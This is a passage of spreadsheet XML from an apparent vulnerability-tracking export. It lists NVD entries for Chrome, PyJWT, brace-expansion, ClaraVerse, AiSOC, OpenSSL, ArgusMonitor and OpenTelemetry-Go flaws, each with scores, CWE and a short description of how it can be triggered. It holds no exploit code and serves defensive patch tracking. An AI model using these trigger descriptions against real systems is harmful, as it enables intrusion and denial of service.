          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95290</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q829" s="5" t="inlineStr"/>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S829" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95290</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95352</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K830" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q830" s="5" t="inlineStr"/>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S830" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95352</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95370</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q831" s="5" t="inlineStr"/>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="S831" s="5" t="inlineStr">
        <is>
          <t>Inappropriate implementation in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95370</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q832" s="5" t="inlineStr"/>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S832" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q833" s="5" t="inlineStr"/>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S833" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q834" s="5" t="inlineStr"/>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S834" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.0 → 5.3)</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102879</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q835" s="5" t="inlineStr"/>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S835" s="5" t="inlineStr">
        <is>
          <t>ClaraVerse through 0.3.1 contains server-side request forgery protection bypasses in the download_file and scrape_web agent tools. Authenticated users can bypass hostname validation and IPv6 transition address filtering to make the server request internal services and cloud instance metadata endpoints.</t>
        </is>
      </c>
      <c r="T835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102879</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.3)</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103053</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q836" s="5" t="inlineStr"/>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S836" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 9.0.0 before 12.0.0 fail to enforce authentication on the response-action API endpoints when AISOC_DEV_MODE is enabled and AISOC_ACTIONS_SERVICE_TOKEN is empty in the default Docker Compose deployment. Unauthenticated attackers can list response-action integrations, submit and approve actions on behalf of arbitrary principals, and dispatch containment actions using vendor credentials.</t>
        </is>
      </c>
      <c r="T836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103053</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 5.3)</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103057</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q837" s="5" t="inlineStr"/>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S837" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 5.1.0 before 12.0.0 contain an authentication bypass vulnerability in the realtime service internal endpoints POST /internal/agent-event and POST /internal/push. Attackers can post arbitrary events with spoofed tenant identifiers to broadcast malicious content over WebSocket and Redis SSE channels or send unauthorized notifications to registered devices.</t>
        </is>
      </c>
      <c r="T837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103057</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35189</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q838" s="5" t="inlineStr"/>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S838" s="5" t="inlineStr">
        <is>
          <t>Issue summary: A certificate with many nameRelativeToCRLIssuer CRL
distribution points causes disproportionate heap growth when OpenSSL caches
X.509 extensions.
Impact summary: Receiving a crafted certificate from a malicious peer can lead
to significant memory pressure and possible Denial of Service in clients or
in servers that solicit client certificates.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: A certificate or a set of certificates that fits under the limit for
size of certificates accepted from the peer (~100 KiB) can result in allocation
of several hundred MiB of resident memory on the receiving side
during a normal TLS handshake.  This may be enough to crash the client or
server, if multiple concurrent connections lead to similarly large memory
allocations.
The fix postpones processing of the CRL distribution points extensions in
certificates to the time when the processed value is required for CRL processing.
This avoids keeping large memory allocations for a long time when such
certificates are received.
FIPS impact: no
The affected code is outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="T838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35189</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42772</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr">
        <is>
          <t>openssl, go</t>
        </is>
      </c>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q839" s="5" t="inlineStr"/>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S839" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The QUIC stream reassembly algorithm performance deteriorates
progressively as packets are arriving out of order. The worst case has
a quadratic complexity proportional to the number of stream frames kept in
the buffer for the received stream data.
Impact summary: A remote QUIC peer that completes the handshake can create
a connection-scoped CPU pressure and potentially a Denial of Service using
compliant STREAM frames inside the advertised receive window, with low
attacker bandwidth.
CWE: CWE-407: Inefficient Algorithmic Complexity
Description: OpenSSL manages received QUIC stream fragments using a
doubly-linked list. While it optimizes for append operations (at the end of
the list), it falls back to a head-to-tail linear search for any fragment
that does not immediately follow the current `tail`.
By manipulating the sequence of offsets, an attacker can force the server
to perform O(n^2) operations, consuming excessive CPU time for the
QUIC process.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42772</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79417</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q840" s="5" t="inlineStr"/>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-367</t>
        </is>
      </c>
      <c r="S840" s="5" t="inlineStr">
        <is>
          <t>Improper Access Control in ArgusMonitor.sys in Argotronic eGbR ArgusMonitor 7.4.02 and earlier allows local, low-privileged users to bypass device handle access restrictions via a TOCTOU condition in IRP_MJ_CREATE and send a crafted IOCTL 0x9C4024A8 request, causing denial-of-service.</t>
        </is>
      </c>
      <c r="T840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79417</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81869</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q841" s="5" t="inlineStr"/>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>CWE-176, CWE-400</t>
        </is>
      </c>
      <c r="S841" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 1.10.0 until 1.33.0, the sdk/trace/span.go attribute truncation path can fail to enforce AttributeValueLengthLimit for string and string-slice attributes containing the valid Unicode replacement character U+FFFD. safeTruncateValidUTF8 treats the valid replacement rune as invalid UTF-8 and returns the original input, while strings.ToValidUTF8 leaves that valid rune unchanged, so a second safeTruncate attempt can also return the oversized value. An attacker who controls span attribute content can retain values longer than the configured limit, increasing per-span memory use and weakening denial-of-service protection in the instrumented process. This issue is fixed in version 1.33.0.</t>
        </is>
      </c>
      <c r="T841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81869</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q842" s="5" t="inlineStr"/>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S842" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95292</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K843" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
